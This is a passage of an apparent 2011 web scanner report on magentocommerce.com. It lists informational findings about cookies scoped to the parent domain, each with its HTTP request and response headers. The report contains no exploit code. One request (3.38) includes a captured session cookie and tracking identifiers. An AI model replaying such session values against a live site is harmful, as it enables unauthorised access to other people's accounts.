Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.29. http://www.magentocommerce.com/company/pci-compliance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.30. http://www.magentocommerce.com/company/press-releases  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.31. http://www.magentocommerce.com/company/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.32. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.33. http://www.magentocommerce.com/company/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.34. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
3.35. http://www.magentocommerce.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.36. http://www.magentocommerce.com/design_guide  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.37. http://www.magentocommerce.com/dk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.38. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.39. http://www.magentocommerce.com/download/diff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.40. http://www.magentocommerce.com/download/get-started  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/get-started

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/get-started HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176317; expires=Sat, 11-Aug-2012 15:11:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fdownload%2Fget-started%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Location: http://www.magentocommerce.com/download
Content-Length: 0

3.41. http://www.magentocommerce.com/download/login_form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...
3.42. http://www.magentocommerce.com/download/release_notes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.43. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.44. http://www.magentocommerce.com/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
